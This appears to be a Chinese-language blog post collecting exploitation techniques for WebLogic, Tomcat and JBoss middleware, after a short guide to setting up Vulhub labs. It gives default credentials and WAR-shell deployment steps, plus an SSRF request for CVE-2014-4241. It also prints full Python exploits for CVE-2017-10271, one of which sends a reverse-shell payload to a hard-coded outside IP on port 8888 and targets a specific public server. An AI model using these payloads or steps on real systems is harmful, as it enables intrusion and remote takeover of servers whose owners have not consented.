前言

一篇叙述中间件漏洞的文章,总结一下一些中间件的漏洞的利用。

渗透环境

在学习一个漏洞的时候,复现是必须要做的,毕竟看再多文章自己不复现下次遇到了这种漏洞还是不一定会有所印象,所以首先说的就是如何去找一些渗透环境。下面分为几种方法,这里只说下如何搭建Vulhub,其他的可以去官网看,都很详细。

  • Vulhub,VulApps(基于Docker,只要几条命令)

  • ZoomEye,傻蛋(方便找一些实战环境)

  • Google,Bing(Google语法,Bing语法还是强大的)

Vulhub与VulApps

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
Vulhub如何安装与使用
安装
apt install git docker.io docker-compose
git clone https://github.com/vulhub/vulhub.git
 
进入漏洞环境
cd vulhub/weblogic/ssrf/
 
自动化编译环境
docker-compose build
 
启动整个环境
docker-compose up -d
 
删除整个环境
docker-compose down
 
VulApps想用的可以去GitHub看说明,两个项目地址放下面了
https://github.com/vulhub/vulhub
https://github.com/Medicean/VulApps

WebLogic

  • 弱口令

  • SSRF

  • 反序列化

弱口令

1
2
3
4
5
6
7
默认端口:7001

默认后台:console/login/loginForm.jsp

弱口令:weblogic/weblogic

部署war步骤:部署&nbsp;->&nbsp;上传文件&nbsp;->&nbsp;选择文件&nbsp;->&nbsp;下一步&nbsp;->&nbsp;下一步</pre>

SSRF

1
2
3
4
5
6
7
8
9
10
11
12
13
CVE-2014-4241
 
漏洞地址:uddiexplorer/
 
EXP: 
GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
 
通过返回值的不同来判断内网端口是否开放

反序列化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
CVE-2016-0638   
 
命令:python2 Weblogic.py (用的时候修改下Main里面的IP和端口)
 
CVE-2017-3248   weblogic_cmd.jar
 
命令:java -jar weblogic_cmd.jar -C ls -H IP -P 7001  
 
CVE-2017-10271(XMLDecode) 
 
漏洞地址:http://45.32.80.225:7001/wls-wsat/CoordinatorPortType11(若地址存在则漏洞存在)
 
EXP  WriteTxt:
import requests
import time
headers = { 'Content-type': 'text/xml' }
data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/bywalks.txt</string><void method="println"><string>Weblogic_Test</string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'''
def exp(ip):
    ip = ip.strip("\n")
    url_post = ip + "/wls-wsat/CoordinatorPortType11"
    url_myfile = ip + "/bea_wls_internal/bywalks.txt"
    print("Test for " + ip + ".....")
    r = requests.post(url=url_post,data=data,headers=headers)
    r2 = requests.get(url_myfile)
    if r2.status_code != 404:
        print("Weblogic Vulnerable!!!")
        print("You file path is " + url_myfile)
    else:
        print("No Vulnerable!!!")
    print("=================================================")
 
if __name__ == '__main__':
    Weblogic_IP_list = []
    with open("weblogic.txt") as f:
        Weblogic_IP_list = f.readlines()
    for ip in Weblogic_IP_list:
        try:
            exp(ip)
            sleep(1)
        except:
            pass

EXP  ReturnShell:
import requests
headers = { 'Content-type': 'text/xml' }
data = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
  <void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
  <void index="0">
<string>/bin/bash</string>
  </void>
  <void index="1">
<string>-c</string>
  </void>
  <void index="2">
<string>bash -i >& /dev/tcp/113.75.162.62/8888 0>&1</string>
  </void>
</array>
  <void method="start"/></void>
</java>
  </work:WorkContext>
</soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>'''
def exp(ip):
    print("Test for " + ip + " .....")
    r = requests.post(url=ip,data=data,headers=headers)
    print(r.status_code)
    print(r.text)
 
if __name__ == '__main__':
    ip = "http://45.32.80.225:7001/wls-wsat/CoordinatorPortType11"
    try:
        exp(ip)
    except:
        pass

Tomcat

  • 弱口令

  • PUT上传

弱口令

1
2
3
4
5
6
7
默认端口:8080
 
默认地址:manager/html
 
生成war命令(到shell的文件夹下):jar -cvf shell.war ./    
 
部署war步骤:选择文件 -> Deploy -> 完成

PUT上传

1
本博客里面有EXP

Jboss

  • 部署WAR

  • 反序列化

部署WAR

1
2
3
4
5
默认端口:8080
 
默认后台:jmx-console
 
部署步骤:Jboss.deployment包下的flavor=URL.type=DeploymentSccanner -> Add Url() -> 远程上传 -> deploy() -> 访问即可

反序列化

1
2
3
CVE-2015-8103   DeserializeExploit.jar
 
CVE-2017-12149  Jboss.jar